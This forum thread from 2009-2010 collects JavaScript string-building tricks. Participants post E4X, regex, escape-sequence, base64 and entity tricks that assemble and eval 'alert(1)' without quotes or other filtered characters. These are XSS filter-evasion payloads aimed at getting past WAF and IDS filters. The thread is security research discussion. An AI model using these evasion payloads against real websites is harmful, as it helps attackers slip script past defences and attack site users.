Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Script obfuscation, filter evasion, IDS/IPS/WAF bypassing... this is where it should live. Because this topic is too big to live anywhere else. Phj33r! 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
String hacks (ways to make a string)
Posted by: sirdarckcat
Date: June 08, 2009 02:14AM

//(look for the authors here: http://sla.ckers.org/forum/read.php?2,15812,page=1)
// Moar: Code Obfuscation Algorithms

// javascript

From native strings
Quote

(undefined='alert(1)',eval(typeof x));

Using base convertion
Quote

490837..toString(1<<5)

E4X morphs
Quote

eval(<>&#34;&#111;&#98;&#102;&#117;&#115;&#99;&#97;&#116;&#101;&#100;&#34;</>+[]) // ff only

Quote

eval(<>&#x22;&#x6f;&#x62;&#x66;&#x75;&#x73;&#x63;&#x61;&#x74;&#x65;&#x64;&#x22;</>+[]) // ff only

Quote

[]+<_>e</_>+<s>v</s>+<z>a</z>+<e44444444>l</e44444444>;// ff only

Quote

<>this is my multi-line text </>.toString(); // ff only

Quote

<><_ x="alert">s</_></>..@x+[]// ff only

RegExp morphs
Quote

eval(unescape(/%22%6f%62%66%75%73%63%61%74%65%64%22/.source))

Quote

/I am a string/[-1];

Quote

/XSS/.source;

Quote

String(/Test/).substr(1,4) ;

Quote

uneval(/eval/).replace(/\//g, [ ] );// not ie

Quote

String(/http:/+/www.website.com/+(/x/+[])[1]+(/m/+[])[1]+(/l/+[])[1]+(/#/+[])[1]).slice(1);//to create URIs

Quote

((x=/(<scr).*(ipt>)/).test(x));(RegExp.$1+RegExp.$2);

toString morphs..

Quote

['I am a string'];//Array converted when toString method called

Quote

Array('I am a string');

Quote

new Array('I am a string');

Base64 morphs

Quote

atob('amF2YXNjcmlwdDphbGVydCgxKQ');// ff only

Quote

btoa("\x7a\xf6\xa5");// ff only

\ escaping

Quote

(b='\\',s='\'',o='0',eval(s+b+141+b+154+b+145+b+162+b+164+b+o+50+b+o+61+b+o+51+s));

Quote

"\145\166\141\154";//oct ("a".charCodeAt().toString(8))

Quote

"\x65\x76\x61\x6c";//hex (can also use \X)

Quote

"\u0065\u0076\u0061\u006c";//unicode

Quote

eval(String.fromCharCode(34,111,98,102,117,115,99,97,116,101,100,34))

Code Sequences

Quote

for(str in {AnyString:0});alert(str);

Quote

for each(obj in {e:{}})for each(obj[<>{<>al</>}{<>ert(1)</>}</>] in {z:0})for(x in obj);eval(x);/* without ' , " , \ , % , + , - , *, = , "," , "." */

html/xml

Quote

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE html [<!ENTITY inject "&#60;script&#62;alert(1)&#60;/script&#62;">]>
<html xmlns="http://www.w3.org/1999/xhtml">&inject;</html>

--------------------------------
http://sirdarckcat.blogspot.com/ http://www.sirdarckcat.net/ http://foro.elhacker.net/ http://twitter.com/sirdarckcat



Edited 13 time(s). Last edit at 06/16/2009 03:39AM by sirdarckcat.

Options: ReplyQuote
Re: String hacks (ways to make a string)
Posted by: backbone
Date: June 14, 2009 03:40PM

Quote

['string']
Quote

window['String']['fromCharCode'](115,116,114,105,110,103)
Quote

{a:'string'}

---
blog [-] microblog

Options: ReplyQuote
Re: String hacks (ways to make a string)
Posted by: hoshikuzu
Date: June 16, 2009 01:38AM

for (foo in {bar:0}){} // foo = "bar"
alert(foo); // alerts "bar"
alert(typeof foo) // alerts "string"



Edited 1 time(s). Last edit at 06/16/2009 01:43AM by hoshikuzu.

Options: ReplyQuote
Re: String hacks (ways to make a string)
Posted by: hoshikuzu
Date: June 16, 2009 01:42AM

for each ( obj in {e:{}}){
for each ( obj[<>{<>al</>}{<>ert(1)</>}</>] in {z:0}){
for (x in obj){
}
}
}

alert(x) // alerts "alert(1)"
alert (typeof x) //alerts "string"

/* without ' , " , \ , % , + , - , *, = , "," , "." */



edit by sdc:
k, added as code sequences.. Greetz!!



Edited 7 time(s). Last edit at 06/16/2009 03:41AM by sirdarckcat.

Options: ReplyQuote
Re: String hacks (ways to make a string)
Posted by: Gareth Heyes
Date: September 02, 2009 08:15AM

/ale/(/ale/)+/rt/(/rt/)

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: String hacks (ways to make a string)
Posted by: tx
Date: September 02, 2009 12:26PM

/alert/()[0]

-tx @ lowtech-labs.org

Options: ReplyQuote
Re: String hacks (ways to make a string)
Posted by: Gareth Heyes
Date: September 02, 2009 01:21PM

@tx

I tried that one but it didn't work for me. Which browser was you testing?

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: String hacks (ways to make a string)
Posted by: tx
Date: September 02, 2009 03:49PM

@Gareth: FF 3.5.2, I originally tested in the Firebug console, but works fine for me from a html document as well:

<html>
  <head>
  <title></title>
  </head>
  <body>
  <script>
  alert(/alert/()[0] + ' : '+typeof /alert/()[0]);
  </script>
  </body>
</html>

-tx @ lowtech-labs.org

Options: ReplyQuote
Re: String hacks (ways to make a string)
Posted by: Gareth Heyes
Date: September 02, 2009 04:10PM

@tx

Weird, I'm using FF3.5.2 but I get errors no input for alert.

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: String hacks (ways to make a string)
Posted by: tx
Date: September 02, 2009 05:31PM

@Gareth: You're right. I'm seeing some inconsistent behavior. I've been able to reproduce that error sometimes but not others. I think it's related to Firebug actually, but I'm not quite sure how yet.

-tx @ lowtech-labs.org

Options: ReplyQuote
Re: String hacks (ways to make a string)
Posted by: Gareth Heyes
Date: September 03, 2009 02:34AM

@tx

I wonder if it's because you did it in the console first? Maybe Firebug is caching the call to the RegExp

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: String hacks (ways to make a string)
Posted by: Gareth Heyes
Date: September 03, 2009 02:40AM

Awesome technique by hoshikuzu which allows you to get individual letters:-
/[^][^][^][^][^]([^])/(~[]/[])

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: String hacks (ways to make a string)
Posted by: Gareth Heyes
Date: September 03, 2009 03:42AM

LOL

eval(/[^][^]([^])[^]([^])[^]([^])[^]([^])[^]([^])[^]([^])[^]([^][^])/(/xaxlxexrxtx(1)/)[1]+/[^][^]([^])[^]([^])[^]([^])[^]([^])[^]([^])[^]([^])[^]([^][^])/(/xaxlxexrxtx(1)/)[2]+/[^][^]([^])[^]([^])[^]([^])[^]([^])[^]([^])[^]([^])[^]([^][^])/(/xaxlxexrxtx(1)/)[3]+/[^][^]([^])[^]([^])[^]([^])[^]([^])[^]([^])[^]([^])[^]([^][^])/(/xaxlxexrxtx(1)/)[4]+/[^][^]([^])[^]([^])[^]([^])[^]([^])[^]([^])[^]([^])[^]([^][^])/(/xaxlxexrxtx(1)/)[5]+/[^][^]([^])[^]([^])[^]([^])[^]([^])[^]([^])[^]([^])[^]([^][^])/(/xaxlxexrxtx(1)/)[6]+1+/[^][^]([^])[^]([^])[^]([^])[^]([^])[^]([^])[^]([^])[^]([^])/(/xaxlxexrxtx(1)/)[7])

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: String hacks (ways to make a string)
Posted by: Matt Presson
Date: September 03, 2009 08:56AM

@Gareth

Please explain a little


-Matt

Options: ReplyQuote
Re: String hacks (ways to make a string)
Posted by: Anonymous User
Date: September 03, 2009 09:04AM

/[^]/ is matching one character - basically any character ([^a] = all but a -> [^] all but nothing). Then again you can use /foo/() as a shortcut for match - which explains why /foo/(/bar/) works.

Options: ReplyQuote
Re: String hacks (ways to make a string)
Posted by: sirdarckcat
Date: September 03, 2009 09:06AM

explaination:

/\w+\W\w+\W/(/alert(1)/)

Greetz!!

--------------------------------
http://sirdarckcat.blogspot.com/ http://www.sirdarckcat.net/ http://foro.elhacker.net/ http://twitter.com/sirdarckcat

Options: ReplyQuote
Re: String hacks (ways to make a string)
Posted by: Matt Presson
Date: September 03, 2009 09:34AM

Got it now. What was confusing is that JavaScript is returning an array due to the capturing groups used within the regex.


-Matt

Options: ReplyQuote
Re: String hacks (ways to make a string)
Posted by: Gareth Heyes
Date: September 03, 2009 10:22AM

Yeah you got it :)

btw here is how I found it....

I was reading Secrets of the Javascript Ninja and it reminded me that a RegExp was defined as a function in FF2. So I tried to execute one in HV. I pass some strings to it and noticed it was an array when I hit "inspect" :) Then I tried RegExps instead of passing it strings and to my delight it worked haha

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]



Edited 1 time(s). Last edit at 09/03/2009 10:22AM by Gareth Heyes.

Options: ReplyQuote
Re: String hacks (ways to make a string)
Posted by: Gareth Heyes
Date: September 14, 2009 03:31AM

hehe

<>//{x='alert(1)'}//</>;eval(x)

http://james.padolsey.com/javascript/javascript-comment-removal-revisted/

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: String hacks (ways to make a string)
Posted by: Gareth Heyes
Date: September 16, 2009 10:26AM

IE only:-

window['locat'+/'/iiiiiiiiiiiiiiiiiiiiiiiiiiiiiiii.options+'on']='javascript:alert(1)'

/;/iiiiiiiiiiiiiiiiiiiiiiiiiiiiiiimmmmmmmmmmmmmmmmmmmmmmmgggggggggggggg.options=='igm'

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: String hacks (ways to make a string)
Posted by: sirdarckcat
Date: September 16, 2009 11:31AM

haha..

--------------------------------
http://sirdarckcat.blogspot.com/ http://www.sirdarckcat.net/ http://foro.elhacker.net/ http://twitter.com/sirdarckcat

Options: ReplyQuote
Re: String hacks (ways to make a string)
Posted by: Anonymous User
Date: September 16, 2009 04:49PM

It's t(ea) time /./gimmi(!!1)

Options: ReplyQuote
Re: String hacks (ways to make a string)
Posted by: Gareth Heyes
Date: January 11, 2010 08:35AM

More e4x string hacks:-

<a>test</a>.*
<>test</>[0]
<>he<!---->he</>
<a>he<![CDATA[ haha ]]>he</a>
<>/*{'he'+/*abc*/'he'}*/</>
new Namespace('ha','ha')[-1]+new Namespace('ha','ha')[-1]
x=new Namespace('ha','ha');x[-1]+x[-2]
new Namespace('haha').uri
new Namespace('haha','haha').prefix
new QName('haha').localName
new QName('haha','haha').uri
new QName('ha','ha')[-1]+new QName('ha','ha')[-2]
<>ha</>+<>ha</>
x=new Namespace("x");y=<x xmlns:x="x" x:x="haha"></x>;y.@x::x
'ha'+<?eh wtf is going on ff?>+'ha'

endeth my e4x hacking investigation

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]



Edited 12 time(s). Last edit at 01/11/2010 09:44AM by Gareth Heyes.

Options: ReplyQuote
Re: String hacks (ways to make a string)
Posted by: rvdh
Date: January 12, 2010 06:45AM

Nice Gaz. That E4X is crazy stuff.

Options: ReplyQuote
Re: String hacks (ways to make a string)
Posted by: Gareth Heyes
Date: January 12, 2010 08:05AM

@rvdh

yeah nuts :)

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: String hacks (ways to make a string)
Posted by: tr3w
Date: June 18, 2010 01:58PM

String concatenation without quotes and addition signs:

eval([<>ale</>,<>rt(1)</>][<>join</>]([])) // only firefox



Edited 1 time(s). Last edit at 06/18/2010 02:10PM by tr3w.

Options: ReplyQuote
Re: String hacks (ways to make a string)
Posted by: Anonymous User
Date: June 18, 2010 04:08PM

@tr3w the comma can be ommitted too

eval((<_><_>ale</_><_>rt(1)</_></_>._.*).split()[0])

Options: ReplyQuote
Re: String hacks (ways to make a string)
Posted by: tr3w
Date: June 18, 2010 06:49PM

@.mario oh right, thanks, and dots can also be avoided, heh, maybe it's very impractical

eval((<_><_>ale</_><_>rt(1)</_></_>[<>_</>][<>*</>])[/concat/[<>source</>]]())

Options: ReplyQuote
Re: String hacks (ways to make a string)
Posted by: Anonymous User
Date: June 19, 2010 07:57AM

@tr3w depends - often there are more use cases for heavily limited character ranges than one might think ;)

Options: ReplyQuote
Re: String hacks (ways to make a string)
Posted by: tr3w
Date: June 20, 2010 01:33AM

A dirty little trick to make strings out of unreadable characters:

atob(['jm','f67','ipwM','M)','r','t(1+M']['map'](btoa)['join']([])['replace'](/[0A=]/g,[]))

Options: ReplyQuote


Sorry, only registered users may post in this forum.